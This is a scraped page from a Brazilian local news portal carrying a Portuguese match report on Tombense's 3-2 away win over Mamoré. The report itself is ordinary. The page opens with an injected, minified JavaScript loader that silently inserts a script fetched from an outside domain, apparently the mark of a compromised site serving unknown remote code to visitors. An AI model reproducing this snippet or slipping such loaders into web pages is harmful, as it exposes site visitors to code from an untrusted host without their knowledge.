;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tombense vai a Patos de Minas, vence o Mamoré fora de casa e esta a uma vitória da da Elite do futebol Mineiro. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Tombense vai a Patos de Minas, vence o Mamoré fora de casa e esta a uma vitória da da Elite do futebol Mineiro.

A partida decisiva entre Mamoré e Tombense começou de maneira eletrizante, somente a vitória interessava aos dois times e desde o início o jogo foi totalmente ofensivo.
O Mamoré foi o primeiro a atacar com perigo aos 3′ de jogo, imediatamente o Tombense respondeu com um escanteio que resultou uma bolada no travessão, mas o lance foi anulado. Aos 6′ a equipe de Tombos teve outro escanteio e o jogador Léo Alemão subiu entre os marcadores e abriu o marcador da partida.
A resposta do Mamoré foi imediata. Aos 11′ o meia Evandro fez linda jogada e bateu cruzado para o gol do zagueiro Jhonathan Machado.
Apesar do empate, o Mamoré não conseguiu impor um domínio sobre o Tombense, que demonstrou ser uma equipe perigosa e exigindo muito do setor defensivo do sapo. Os atacantes Azulão e Dudu sempre perigosos incomodaram muito no primeiro tempo.
O Mamoré conseguiu levar perigo nas jogadas de Evandro e nos chutes de longa distância do jogador Thiago Carvalho.
O marcador Paulinho do Mamoré recebeu cartão amarelo aos 41′ do primeiro tempo, após matar um contra ataque. Na cobrança da falta a zaga do Mamoré sofreu o segundo gol de cabeça da noite. Cruzamento para dentro da área e Felipe marcou aos 43′.
No último lance do primeiro tempo o atacante Maxuell mandou a bola no travessão do Tombense que terminou o primeiro tempo na frente. Os jogadores do Mamoré reclamaram muito da arbitragem no intervalo, alegando que o jogador Felipe estava impedido quando fez de cabeça. A torcida reagiu contra o goleiro Thiago Oliveira, entendendo que ele deveria ter saído na bola do segundo gol.
No intervalo o treinador Eugênio Souza sacou Jéfferson e colocou o atacante Roberth para tentar melhorar o poder ofensivo da equipe esmeraldina. Nos primeiros minutos o jogador Thiago Carvalho passou um susto em todos ao cair sentido dores, mas foi diagnosticado um pisão no punho e ele seguiu na partida.
Aos 6′ o Tombense voltou a sofrer um ataque perigoso e o Mamoré demonstrou sua maior deficiência, bola na área e cabeçada que a bola atingiu o travessão.
Um minuto depois o Tombense marcou o 3º gol na partida. O lateral Beto ajeitou para Thiago Azulão que bateu forte aos 7′ e saiu para comemorar.
Perdendo de 3 a 1, o treinador Eugênio Souza sacou Maxuell e entrou com o marcador Marcelinho no meio campo.
O Mamoré conseguiu diminuir aos 17′ com o atacante Roberth. Após boa jogada de Evandro, a bola sobrou para Roberth que chutou forte, a bola bateu no zagueiro e enganou o goleiro para alegria da torcida verde.
Na sequência o Mamoré quase conseguiu o empate após chute de Jhonathan Machado. Com a pressão o Tombense recuou para tentar garantir a vitória em Patos de Minas.
Aos 31′ Eugênio Souza jogou suas últimas fichas ao sacar o lateral direito Ricardo e entrar com o meia atacante Robertinho.
Aos 37′ o meia Evandro cobrou falta perigosa e a bola tocou travessão e saiu pela linha de fundo. No desespero o Mamoré ainda tentou no finalzinho da partida, mas o time não conseguiu o resultado esperado e sofreu a derrota decepcionante diante da sua torcida. O Tombense foi merecedor da vitória.
No Fausto Alvin o Araxá empatou em 2 a 2 com o Ipatinga e está de volta a elite do futebol Mineiro.